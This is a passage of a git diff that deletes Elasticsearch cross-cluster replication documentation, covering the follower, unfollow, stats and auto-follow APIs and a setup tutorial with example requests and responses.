-==== {api-description-title} - -A following index takes out retention leases on its leader index. 
These -retention leases are used to increase the likelihood that the shards of the -leader index retain the history of operations that the shards of the following -index need to execute replication. When a follower index is converted to a -regular index via the <> (either via explicit -execution of this API, or implicitly via {ilm}), these retention leases are -removed. However, removing these retention leases can fail (e.g., if the remote -cluster containing the leader index is unavailable). While these retention -leases will eventually expire on their own, their extended existence can cause -the leader index to hold more history than necessary, and prevent {ilm} from -performing some operations on the leader index. This API exists to enable -manually removing these retention leases when the unfollow API was unable to do -so. - -NOTE: This API does not stop replication by a following index. If you use this -API targeting a follower index that is still actively following, the following -index will add back retention leases on the leader. The only purpose of this API -is to handle the case of failure to remove the following retention leases after -the <> is invoked. - -[[ccr-post-forget-follower-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) The name of the leader index. - -[[ccr-post-forget-follower-request-body]] -==== {api-request-body-title} - -`follower_cluster`:: - (Required, string) The name of the cluster containing the follower index. - -`follower_index`:: - (Required, string) The name of the follower index. - -`follower_index_uuid`:: - (Required, string) The UUID of the follower index. - -`leader_remote_cluster`:: - (Required, string) The alias (from the perspective of the cluster containing - the follower index) of the <> - containing the leader index. - -[[ccr-post-forget-follower-examples]] -==== {api-examples-title} - -This example removes the follower retention leases for `follower_index` from -`leader_index`. - -[source,console] --------------------------------------------------- -POST /leader_index/_ccr/forget_follower -{ - "follower_cluster" : "follower_cluster", - "follower_index" : "follower_index", - "follower_index_uuid" : "vYpnaWPRQB6mNspmoCeYyA", - "leader_remote_cluster" : "leader_cluster" -} --------------------------------------------------- -// TEST[skip_shard_failures] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_shards" : { - "total" : 1, - "successful" : 1, - "failed" : 0, - "failures" : [ ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"total" : 1/"total" : $body._shards.total/] -// TESTRESPONSE[s/"successful" : 1/"successful" : $body._shards.successful/] -// TESTRESPONSE[s/"failed" : 0/"failed" : $body._shards.failed/] -// TESTRESPONSE[s/"failures" : \[ \]/"failures" : $body._shards.failures/] diff --git a/docs/reference/ccr/apis/follow/post-pause-follow.asciidoc b/docs/reference/ccr/apis/follow/post-pause-follow.asciidoc deleted file mode 100644 index 196fd8dc9f6..00000000000 --- a/docs/reference/ccr/apis/follow/post-pause-follow.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-post-pause-follow]] -=== Pause follower API -++++ -Pause follower -++++ - -Pauses a follower index. 
- -[[ccr-post-pause-follow-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -////////////////////////// - -[source,console] --------------------------------------------------- -POST //_ccr/pause_follow --------------------------------------------------- -// TEST[s//follower_index/] - -[[ccr-post-pause-follow-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ccr` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-post-pause-follow-desc]] -==== {api-description-title} - -This API pauses a follower index. When this API returns, the follower index will -not fetch any additional operations from the leader index. You can resume -following with the <>. Pausing and -resuming a follower index can be used to change the configuration of the -following task. - -[[ccr-post-pause-follow-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) The name of the follower index. - -[[ccr-post-pause-follow-examples]] -==== {api-examples-title} - -This example pauses a follower index named `follower_index`: - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/follow/post-resume-follow.asciidoc b/docs/reference/ccr/apis/follow/post-resume-follow.asciidoc deleted file mode 100644 index 32ef91f8356..00000000000 --- a/docs/reference/ccr/apis/follow/post-resume-follow.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-post-resume-follow]] -=== Resume follower API -++++ -Resume follower -++++ - -Resumes a follower index. - -[[ccr-post-resume-follow-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} - -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -POST //_ccr/resume_follow -{ -} --------------------------------------------------- -// TEST[s//follower_index/] -// TEST[s//remote_cluster/] -// TEST[s//leader_index/] - -[[ccr-post-resume-follow-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `write` and `monitor` -index privileges for the follower index. You must have `read` and `monitor` -index privileges for the leader index. 
You must also have `manage_ccr` cluster
privileges on the cluster that contains the follower index. For more information,
see <>.

[[ccr-post-resume-follow-desc]]
==== {api-description-title}

This API resumes a follower index that has been paused either explicitly with
the <> or implicitly because following failed with an error that
could not be retried. When this API returns, the follower index will resume
fetching operations from the leader index.

[[ccr-post-resume-follow-path-parms]]
==== {api-path-parms-title}

``::
  (Required, string) The name of the follower index.

[[ccr-post-resume-follow-request-body]]
==== {api-request-body-title}
include::../follow-request-body.asciidoc[]

[[ccr-post-resume-follow-examples]]
==== {api-examples-title}

This example resumes a follower index named `follower_index`:

[source,console]
--------------------------------------------------
POST /follower_index/_ccr/resume_follow
{
  "max_read_request_operation_count" : 1024,
  "max_outstanding_read_requests" : 16,
  "max_read_request_size" : "1024k",
  "max_write_request_operation_count" : 32768,
  "max_write_request_size" : "16k",
  "max_outstanding_write_requests" : 8,
  "max_write_buffer_count" : 512,
  "max_write_buffer_size" : "512k",
  "max_retry_delay" : "10s",
  "read_poll_timeout" : "30s"
}
--------------------------------------------------

The API returns the following result:

[source,console-result]
--------------------------------------------------
{
  "acknowledged" : true
}
--------------------------------------------------
diff --git a/docs/reference/ccr/apis/follow/post-unfollow.asciidoc b/docs/reference/ccr/apis/follow/post-unfollow.asciidoc
deleted file mode 100644
index d74f38aa221..00000000000
--- a/docs/reference/ccr/apis/follow/post-unfollow.asciidoc
+++ /dev/null
@@ -1,82 +0,0 @@
[role="xpack"]
[testenv="platinum"]
[[ccr-post-unfollow]]
=== Unfollow API
++++
Unfollow
++++

Converts a follower index to a regular index.

[[ccr-post-unfollow-request]]
==== {api-request-title}

//////////////////////////

[source,console]
--------------------------------------------------
PUT /follower_index/_ccr/follow?wait_for_active_shards=1
{
  "remote_cluster" : "remote_cluster",
  "leader_index" : "leader_index"
}

POST /follower_index/_ccr/pause_follow

POST /follower_index/_close
--------------------------------------------------
// TESTSETUP
// TEST[setup:remote_cluster_and_leader_index]

//////////////////////////

[source,console]
--------------------------------------------------
POST //_ccr/unfollow
--------------------------------------------------
// TEST[s//follower_index/]

[[ccr-post-unfollow-prereqs]]
==== {api-prereq-title}

* If the {es} {security-features} are enabled, you must have `manage_follow_index`
index privileges for the follower index. For more information, see
<>.

[[ccr-post-unfollow-desc]]
==== {api-description-title}

This API stops the following task associated with a follower index and removes
index metadata and settings associated with {ccr}. This enables the index to be
treated as a regular index. The follower index must be paused and closed before
invoking the unfollow API, as shown in the sketch below.

NOTE: Currently {ccr} does not support converting an existing regular index to a
follower index. Converting a follower index to a regular index is an
irreversible operation.
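For reference, the full sequence might look like the following. This is a
minimal sketch that assumes a follower index named `follower_index`; the pause
and close requests must succeed before the unfollow request is sent.

[source,console]
--------------------------------------------------
POST /follower_index/_ccr/pause_follow

POST /follower_index/_close

POST /follower_index/_ccr/unfollow
--------------------------------------------------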
- -[[ccr-post-unfollow-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) The name of the follower index. - -[[ccr-post-unfollow-examples]] -==== {api-examples-title} - -This example converts `follower_index` from a follower index to a regular index: - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/unfollow --------------------------------------------------- -// TEST - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/follow/put-follow.asciidoc b/docs/reference/ccr/apis/follow/put-follow.asciidoc deleted file mode 100644 index 5a7f86e70a6..00000000000 --- a/docs/reference/ccr/apis/follow/put-follow.asciidoc +++ /dev/null @@ -1,119 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-put-follow]] -=== Create follower API -++++ -Create follower -++++ - -Creates a follower index. - -[[ccr-put-follow-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT //_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "", - "leader_index" : "" -} --------------------------------------------------- -// TEST[setup:remote_cluster_and_leader_index] -// TEST[s//follower_index/] -// TEST[s//remote_cluster/] -// TEST[s//leader_index/] - -[[ccr-put-follow-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `write`, `monitor`, -and `manage_follow_index` index privileges for the follower index. You must have -`read` and `monitor` index privileges for the leader index. You must also have -`manage_ccr` cluster privileges on the cluster that contains the follower index. -For more information, see <>. - -[[ccr-put-follow-desc]] -==== {api-description-title} - -This API creates a new follower index that is configured to follow the -referenced leader index. When this API returns, the follower index exists, and -{ccr} starts replicating operations from the leader index to the follower index. - -[[ccr-put-follow-path-parms]] -==== {api-path-parms-title} - -``:: - (Required, string) The name of the follower index. - -[[ccr-put-follow-query-params]] -==== {api-query-parms-title} - -`wait_for_active_shards`:: - (Optional, integer) Specifies the number of shards to wait on being active before - responding. This defaults to waiting on none of the shards to be active. A - shard must be restored from the leader index before being active. Restoring a - follower shard requires transferring all the remote Lucene segment files to - the follower index. - - -[[ccr-put-follow-request-body]] -==== {api-request-body-title} - -`leader_index`:: - (Required, string) The name of the index in the leader cluster to follow. - -`remote_cluster`:: - (Required, string) The <> containing - the leader index. 
- -include::../follow-request-body.asciidoc[] - -[[ccr-put-follow-examples]] -==== {api-examples-title} - -This example creates a follower index named `follower_index`: - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index", - "settings": { - "index.number_of_replicas": 0 - }, - "max_read_request_operation_count" : 1024, - "max_outstanding_read_requests" : 16, - "max_read_request_size" : "1024k", - "max_write_request_operation_count" : 32768, - "max_write_request_size" : "16k", - "max_outstanding_write_requests" : 8, - "max_write_buffer_count" : 512, - "max_write_buffer_size" : "512k", - "max_retry_delay" : "10s", - "read_poll_timeout" : "30s" -} --------------------------------------------------- -// TEST[setup:remote_cluster_and_leader_index] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "follow_index_created" : true, - "follow_index_shards_acked" : true, - "index_following_started" : true -} --------------------------------------------------- diff --git a/docs/reference/ccr/apis/get-ccr-stats.asciidoc b/docs/reference/ccr/apis/get-ccr-stats.asciidoc deleted file mode 100644 index 4f781bce6e6..00000000000 --- a/docs/reference/ccr/apis/get-ccr-stats.asciidoc +++ /dev/null @@ -1,180 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-get-stats]] -=== Get {ccr} stats API -[subs="attributes"] -++++ -Get {ccr-init} stats -++++ - -Get {ccr} stats. - -[[ccr-get-stats-request]] -==== {api-request-title} - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT /follower_index/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index" -} --------------------------------------------------- -// TESTSETUP -// TEST[setup:remote_cluster_and_leader_index] - -[source,console] --------------------------------------------------- -POST /follower_index/_ccr/pause_follow --------------------------------------------------- -// TEARDOWN - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_ccr/stats --------------------------------------------------- - -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor` cluster -privileges on the cluster that contains the follower index. For more information, -see <>. - -[[ccr-get-stats-desc]] -==== {api-description-title} - -This API gets {ccr} stats. This API will return all stats related to {ccr}. In -particular, this API returns stats about auto-following, and returns the same -shard-level stats as in the <>. - -[role="child_attributes"] -[[ccr-get-stats-response-body]] -==== {api-response-body-title} - -//Begin auto_follow_stats -`auto_follow_stats`:: -(object) An object representing stats for the auto-follow coordinator. -+ -.Properties of `auto_follow_stats` -[%collapsible%open] -==== -`number_of_failed_follow_indices`:: -(long) The number of indices that the auto-follow coordinator failed to -automatically follow. The causes of recent failures are captured in the logs -of the elected master node and in the -`auto_follow_stats.recent_auto_follow_errors` field. 
- -`number_of_failed_remote_cluster_state_requests`:: -(long) The number of times that the auto-follow coordinator failed to retrieve -the cluster state from a remote cluster registered in a collection of -auto-follow patterns. - -`number_of_successful_follow_indices`:: -(long) The number of indices that the auto-follow coordinator successfully -followed. - -`recent_auto_follow_errors`:: -(array) An array of objects representing failures by the auto-follow coordinator. -==== -//End auto_follow_stats - -`follow_stats`:: -(object) An object representing shard-level stats for follower indices; refer to -the details of the response in the -<>. - -[[ccr-get-stats-examples]] -==== {api-examples-title} - -This example retrieves {ccr} stats: - -[source,console] --------------------------------------------------- -GET /_ccr/stats --------------------------------------------------- - -The API returns the following results: - -[source,console-result] --------------------------------------------------- -{ - "auto_follow_stats" : { - "number_of_failed_follow_indices" : 0, - "number_of_failed_remote_cluster_state_requests" : 0, - "number_of_successful_follow_indices" : 1, - "recent_auto_follow_errors" : [], - "auto_followed_clusters" : [] - }, - "follow_stats" : { - "indices" : [ - { - "index" : "follower_index", - "shards" : [ - { - "remote_cluster" : "remote_cluster", - "leader_index" : "leader_index", - "follower_index" : "follower_index", - "shard_id" : 0, - "leader_global_checkpoint" : 1024, - "leader_max_seq_no" : 1536, - "follower_global_checkpoint" : 768, - "follower_max_seq_no" : 896, - "last_requested_seq_no" : 897, - "outstanding_read_requests" : 8, - "outstanding_write_requests" : 2, - "write_buffer_operation_count" : 64, - "follower_mapping_version" : 4, - "follower_settings_version" : 2, - "follower_aliases_version" : 8, - "total_read_time_millis" : 32768, - "total_read_remote_exec_time_millis" : 16384, - "successful_read_requests" : 32, - "failed_read_requests" : 0, - "operations_read" : 896, - "bytes_read" : 32768, - "total_write_time_millis" : 16384, - "write_buffer_size_in_bytes" : 1536, - "successful_write_requests" : 16, - "failed_write_requests" : 0, - "operations_written" : 832, - "read_exceptions" : [ ], - "time_since_last_read_millis" : 8 - } - ] - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"number_of_failed_follow_indices" : 0/"number_of_failed_follow_indices" : $body.auto_follow_stats.number_of_failed_follow_indices/] -// TESTRESPONSE[s/"number_of_failed_remote_cluster_state_requests" : 0/"number_of_failed_remote_cluster_state_requests" : $body.auto_follow_stats.number_of_failed_remote_cluster_state_requests/] -// TESTRESPONSE[s/"number_of_successful_follow_indices" : 1/"number_of_successful_follow_indices" : $body.auto_follow_stats.number_of_successful_follow_indices/] -// TESTRESPONSE[s/"recent_auto_follow_errors" : \[\]/"recent_auto_follow_errors" : $body.auto_follow_stats.recent_auto_follow_errors/] -// TESTRESPONSE[s/"auto_followed_clusters" : \[\]/"auto_followed_clusters" : $body.auto_follow_stats.auto_followed_clusters/] -// TESTRESPONSE[s/"leader_global_checkpoint" : 1024/"leader_global_checkpoint" : $body.follow_stats.indices.0.shards.0.leader_global_checkpoint/] -// TESTRESPONSE[s/"leader_max_seq_no" : 1536/"leader_max_seq_no" : $body.follow_stats.indices.0.shards.0.leader_max_seq_no/] -// TESTRESPONSE[s/"follower_global_checkpoint" : 768/"follower_global_checkpoint" : 
$body.follow_stats.indices.0.shards.0.follower_global_checkpoint/] -// TESTRESPONSE[s/"follower_max_seq_no" : 896/"follower_max_seq_no" : $body.follow_stats.indices.0.shards.0.follower_max_seq_no/] -// TESTRESPONSE[s/"last_requested_seq_no" : 897/"last_requested_seq_no" : $body.follow_stats.indices.0.shards.0.last_requested_seq_no/] -// TESTRESPONSE[s/"outstanding_read_requests" : 8/"outstanding_read_requests" : $body.follow_stats.indices.0.shards.0.outstanding_read_requests/] -// TESTRESPONSE[s/"outstanding_write_requests" : 2/"outstanding_write_requests" : $body.follow_stats.indices.0.shards.0.outstanding_write_requests/] -// TESTRESPONSE[s/"write_buffer_operation_count" : 64/"write_buffer_operation_count" : $body.follow_stats.indices.0.shards.0.write_buffer_operation_count/] -// TESTRESPONSE[s/"follower_mapping_version" : 4/"follower_mapping_version" : $body.follow_stats.indices.0.shards.0.follower_mapping_version/] -// TESTRESPONSE[s/"follower_settings_version" : 2/"follower_settings_version" : $body.follow_stats.indices.0.shards.0.follower_settings_version/] -// TESTRESPONSE[s/"follower_aliases_version" : 8/"follower_aliases_version" : $body.follow_stats.indices.0.shards.0.follower_aliases_version/] -// TESTRESPONSE[s/"total_read_time_millis" : 32768/"total_read_time_millis" : $body.follow_stats.indices.0.shards.0.total_read_time_millis/] -// TESTRESPONSE[s/"total_read_remote_exec_time_millis" : 16384/"total_read_remote_exec_time_millis" : $body.follow_stats.indices.0.shards.0.total_read_remote_exec_time_millis/] -// TESTRESPONSE[s/"successful_read_requests" : 32/"successful_read_requests" : $body.follow_stats.indices.0.shards.0.successful_read_requests/] -// TESTRESPONSE[s/"failed_read_requests" : 0/"failed_read_requests" : $body.follow_stats.indices.0.shards.0.failed_read_requests/] -// TESTRESPONSE[s/"operations_read" : 896/"operations_read" : $body.follow_stats.indices.0.shards.0.operations_read/] -// TESTRESPONSE[s/"bytes_read" : 32768/"bytes_read" : $body.follow_stats.indices.0.shards.0.bytes_read/] -// TESTRESPONSE[s/"total_write_time_millis" : 16384/"total_write_time_millis" : $body.follow_stats.indices.0.shards.0.total_write_time_millis/] -// TESTRESPONSE[s/"write_buffer_size_in_bytes" : 1536/"write_buffer_size_in_bytes" : $body.follow_stats.indices.0.shards.0.write_buffer_size_in_bytes/] -// TESTRESPONSE[s/"successful_write_requests" : 16/"successful_write_requests" : $body.follow_stats.indices.0.shards.0.successful_write_requests/] -// TESTRESPONSE[s/"failed_write_requests" : 0/"failed_write_requests" : $body.follow_stats.indices.0.shards.0.failed_write_requests/] -// TESTRESPONSE[s/"operations_written" : 832/"operations_written" : $body.follow_stats.indices.0.shards.0.operations_written/] -// TESTRESPONSE[s/"time_since_last_read_millis" : 8/"time_since_last_read_millis" : $body.follow_stats.indices.0.shards.0.time_since_last_read_millis/] diff --git a/docs/reference/ccr/auto-follow.asciidoc b/docs/reference/ccr/auto-follow.asciidoc deleted file mode 100644 index d072dd8022b..00000000000 --- a/docs/reference/ccr/auto-follow.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-auto-follow]] -=== Manage auto-follow patterns -To replicate time series indices, you configure an auto-follow pattern so that -each new index in the series is replicated automatically. Whenever the name of -a new index on the remote cluster matches the auto-follow pattern, a -corresponding follower index is added to the local cluster. 
- -Auto-follow patterns are especially useful with -<>, which might continually create -new indices on the cluster containing the leader index. - -[[ccr-access-ccr-auto-follow]] -To start using {ccr} auto-follow patterns, access {kib} and go to -*Management > Stack Management*. In the side navigation, select -*Cross-Cluster Replication* and choose the *Auto-follow patterns* tab - -[[ccr-auto-follow-create]] -==== Create auto-follow patterns -When you <>, -you are configuring a collection of patterns against a single remote cluster. -When an index is created in the remote cluster with a name that matches one of -the patterns in the collection, a follower index is configured in the local -cluster. The follower index uses the new index as its leader index. - -[%collapsible] -.Use the API -==== -Use the <> to add a -new auto-follow pattern configuration. -==== - -[[ccr-auto-follow-retrieve]] -==== Retrieve auto-follow patterns -To view existing auto-follow patterns and make changes to the backing -patterns, <> on your _remote_ cluster. - -Select the auto-follow pattern that you want to view details about. From there, -you can make changes to the auto-follow pattern. You can also view your -follower indices included in the auto-follow pattern. - -[%collapsible] -.Use the API -==== -Use the <> to inspect -all configured auto-follow pattern collections. -==== - -[[ccr-auto-follow-pause]] -==== Pause and resume auto-follow patterns -To pause and resume replication of auto-follow pattern collections, -<>, select the auto-follow pattern, -and pause replication. - -To resume replication, select the pattern and choose -*Manage pattern > Resume replication*. - -[%collapsible] -.Use the API -==== -Use the <> to -pause auto-follow patterns. -Use the <> to -resume auto-follow patterns. -==== - -[[ccr-auto-follow-delete]] -==== Delete auto-follow patterns -To delete an auto-follow pattern collection, -<>, select the auto-follow pattern, -and pause replication. - -When the pattern status changes to Paused, choose -*Manage pattern > Delete pattern*. - -[%collapsible] -.Use the API -==== -Use the <> to -delete a configured auto-follow pattern collection. -==== diff --git a/docs/reference/ccr/getting-started.asciidoc b/docs/reference/ccr/getting-started.asciidoc deleted file mode 100644 index 40bffe49c3e..00000000000 --- a/docs/reference/ccr/getting-started.asciidoc +++ /dev/null @@ -1,333 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ccr-getting-started]] -=== Tutorial: Set up {ccr} -++++ -Set up {ccr} -++++ - -//// -[source,console] ----- -PUT /server-metrics -{ - "settings" : { - "index" : { - "number_of_shards" : 1, - "number_of_replicas" : 0 - } - }, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - }, - "accept" : { - "type" : "long" - }, - "deny" : { - "type" : "long" - }, - "host" : { - "type" : "keyword" - }, - "response" : { - "type" : "float" - }, - "service" : { - "type" : "keyword" - }, - "total" : { - "type" : "long" - } - } - } -} ----- -// TESTSETUP -//// - -Use this guide to set up {ccr} (CCR) between clusters in two -datacenters. 
Replicating your data across datacenters provides several benefits:

* Brings data closer to your users or application server to reduce latency and
response time
* Provides your mission-critical applications with the tolerance to withstand datacenter or region outages

In this guide, you'll learn how to:

* Configure a <> with a leader index
* Create a follower index on a local cluster
* Create an auto-follow pattern to automatically follow time series indices
that are periodically created in a remote cluster

You can manually create follower indices to replicate specific indices on a
remote cluster, or configure auto-follow patterns to replicate rolling time series indices.

video::https://static-www.elastic.co/v3/assets/bltefdd0b53724fa2ce/blt994089f5e841ad69/5f6265de6f40ab4648b5cf9b/ccr-setup-video-edited.mp4[width=700, height=500, options="autoplay,loop"]

[[ccr-getting-started-prerequisites]]
==== Prerequisites
To complete this tutorial, you need:

* A license on both clusters that includes {ccr}. {kibana-ref}/managing-licenses.html[Activate a free 30-day trial].
* The `read_ccr` cluster privilege and `monitor` and `read` privileges
for the leader index on the remote cluster. <>.
* The `manage_ccr` cluster privilege and `monitor`, `read`, `write` and
`manage_follow_index` privileges to configure remote clusters and follower
indices on the local cluster. <>.
* An index on the remote cluster that contains the data you want to replicate.
This tutorial uses the sample eCommerce orders data set.
{kibana-ref}/get-started.html#gs-get-data-into-kibana[Load sample data].

[[ccr-getting-started-remote-cluster]]
==== Connect to a remote cluster
To replicate an index on a remote cluster (Cluster A) to a local cluster (Cluster B), you configure Cluster A as a remote on Cluster B.

image::images/ccr-tutorial-clusters.png[ClusterA contains the leader index and ClusterB contains the follower index]

To configure a remote cluster from Stack Management in {kib}:

. Select *Remote Clusters* from the side navigation.
. Specify the IP address or host name of the remote cluster (ClusterA),
followed by the transport port of the remote cluster (defaults to `9300`). For
example, `192.168.1.1:9300`.

[role="screenshot"]
image::images/ccr-add-remote-cluster.png["The Add remote clusters page in {kib}"]

[%collapsible]
.API example
====
Use the <> to add a remote cluster:

[source,console]
--------------------------------------------------
PUT /_cluster/settings
{
  "persistent" : {
    "cluster" : {
      "remote" : {
        "leader" : {
          "seeds" : [
            "127.0.0.1:9300" <1>
          ]
        }
      }
    }
  }
}
--------------------------------------------------
// TEST[setup:host]
// TEST[s/127.0.0.1:9300/\${transport_host}/]
<1> Specifies the hostname and transport port of a seed node in the remote
    cluster.

You can verify that the local cluster is successfully connected to the remote
cluster.

[source,console]
--------------------------------------------------
GET /_remote/info
--------------------------------------------------
// TEST[continued]

The API will respond by showing that the local cluster is connected to the
remote cluster.
- -[source,console-result] --------------------------------------------------- -{ - "leader" : { - "seeds" : [ - "127.0.0.1:9300" - ], - "connected" : true, <1> - "num_nodes_connected" : 1, <2> - "max_connections_per_cluster" : 3, - "initial_connect_timeout" : "30s", - "skip_unavailable" : false, - "mode" : "sniff" - } -} --------------------------------------------------- -// TESTRESPONSE[s/127.0.0.1:9300/$body.leader.seeds.0/] -// TEST[s/"connected" : true/"connected" : $body.leader.connected/] -// TEST[s/"num_nodes_connected" : 1/"num_nodes_connected" : $body.leader.num_nodes_connected/] -<1> This shows the local cluster is connected to the remote cluster with cluster - alias `leader` -<2> This shows the number of nodes in the remote cluster the local cluster is - connected to. -==== - -[[ccr-enable-soft-deletes]] -==== Enable soft deletes on leader indices -To follow an index, it must have been created with -<> enabled. If the index doesn’t have -soft deletes enabled, you must reindex it and use the new index as the leader -index. Soft deletes are enabled by default on new indices -created with {es} 7.0.0 and later. - -[[ccr-getting-started-follower-index]] -==== Create a follower index to replicate a specific index -When you create a follower index, you reference the remote cluster and the -leader index in your remote cluster. - -To create a follower index from Stack Management in {kib}: - -. Select *Cross-Cluster Replication* in the side navigation and choose the -*Follower Indices* tab. -. Choose the cluster (ClusterA) containing the leader index you want to -replicate. -. Enter the name of the leader index, which is -`kibana_sample_data_ecommerce` if you are following the tutorial. -. Enter a name for your follower index, such as `follower-kibana-sample-data`. - -image::images/ccr-add-follower-index.png["Adding a follower index named server-metrics in {kib}"] - -{es} initializes the follower using the -<> -process, which transfers the existing Lucene segment files from the leader -index to the follower index. The index status changes to *Paused*. When the -remote recovery process is complete, the index following begins and the status -changes to *Active*. - -When you index documents into your leader index, {es} replicates the documents -in the follower index. - -[role="screenshot"] -image::images/ccr-follower-index.png["The Cross-Cluster Replication page in {kib}"] - -[%collapsible] -.API example -==== -Use the <> to create follower indices. -When you create a follower index, you must reference the remote cluster and the -leader index that you created in the -remote cluster. - -When initiating the follower request, the response returns before the -<> process completes. To wait for the process -to complete, add the `wait_for_active_shards` parameter to your request. 
- -[source,console] --------------------------------------------------- -PUT /server-metrics-follower/_ccr/follow?wait_for_active_shards=1 -{ - "remote_cluster" : "leader", - "leader_index" : "server-metrics" -} --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -[source,console-result] --------------------------------------------------- -{ - "follow_index_created" : true, - "follow_index_shards_acked" : true, - "index_following_started" : true -} --------------------------------------------------- - -////////////////////////// - -Use the -<> to inspect the status of -replication - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /server-metrics-follower/_ccr/pause_follow - -POST /server-metrics-follower/_close - -POST /server-metrics-follower/_ccr/unfollow --------------------------------------------------- -// TEST[continued] - -////////////////////////// -==== - -[[ccr-getting-started-auto-follow]] -==== Create an auto-follow pattern to replicate time series indices -You use <> to automatically create new -followers for rolling time series indices. Whenever the name of a new index on -the remote cluster matches the auto-follow pattern, a corresponding follower -index is added to the local cluster. - -An auto-follow pattern specifies the remote cluster you want to replicate from, -and one or more index patterns that specify the rolling time series indices you -want to replicate. - -// tag::ccr-create-auto-follow-pattern-tag[] -To create an auto-follow pattern from Stack Management in {kib}: - -. Select *Cross Cluster Replication* in the side navigation and choose the -*Auto-follow patterns* tab. -. Enter a name for the auto-follow pattern, such as `beats`. -. Choose the remote cluster that contains the index you want to replicate, -which in the example scenario is Cluster A. -. Enter one or more index patterns that identify the indices you want to -replicate from the remote cluster. For example, enter -`metricbeat-* packetbeat-*` to automatically create followers for {metricbeat} and {packetbeat} indices. -. Enter *follower-* as the prefix to apply to the names of the follower indices so -you can more easily identify replicated indices. - -As new indices matching these patterns are -created on the remote, {es} automatically replicates them to local follower indices. - -[role="screenshot"] -image::images/auto-follow-patterns.png["The Auto-follow patterns page in {kib}"] - -// end::ccr-create-auto-follow-pattern-tag[] - -[%collapsible] -.API example -==== -Use the <> to -configure auto-follow patterns. - -[source,console] --------------------------------------------------- -PUT /_ccr/auto_follow/beats -{ - "remote_cluster" : "leader", - "leader_index_patterns" : - [ - "metricbeat-*", <1> - "packetbeat-*" <2> - ], - "follow_index_pattern" : "{{leader_index}}-copy" <3> -} --------------------------------------------------- -// TEST[continued] -<1> Automatically follow new {metricbeat} indices. -<2> Automatically follow new {packetbeat} indices. -<3> The name of the follower index is derived from the name of the leader index - by adding the suffix `-copy` to the name of the leader index. 
- -////////////////////////// - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true -} --------------------------------------------------- - -////////////////////////// - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_ccr/auto_follow/beats --------------------------------------------------- -// TEST[continued] - -////////////////////////// -==== diff --git a/docs/reference/ccr/images/auto-follow-patterns.jpg b/docs/reference/ccr/images/auto-follow-patterns.jpg deleted file mode 100644 index bc32d8fadfa..00000000000 Binary files a/docs/reference/ccr/images/auto-follow-patterns.jpg and /dev/null differ diff --git a/docs/reference/ccr/images/auto-follow-patterns.png b/docs/reference/ccr/images/auto-follow-patterns.png deleted file mode 100644 index 69e1cc8641b..00000000000 Binary files a/docs/reference/ccr/images/auto-follow-patterns.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-add-follower-index.png b/docs/reference/ccr/images/ccr-add-follower-index.png deleted file mode 100644 index c61ff967769..00000000000 Binary files a/docs/reference/ccr/images/ccr-add-follower-index.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-add-remote-cluster.png b/docs/reference/ccr/images/ccr-add-remote-cluster.png deleted file mode 100644 index c781b86df44..00000000000 Binary files a/docs/reference/ccr/images/ccr-add-remote-cluster.png and /dev/null differ diff --git a/docs/reference/ccr/images/ccr-arch-bi-directional.png b/docs/reference/ccr/images/ccr-arch-bi-directional.png deleted file mode 100644 index 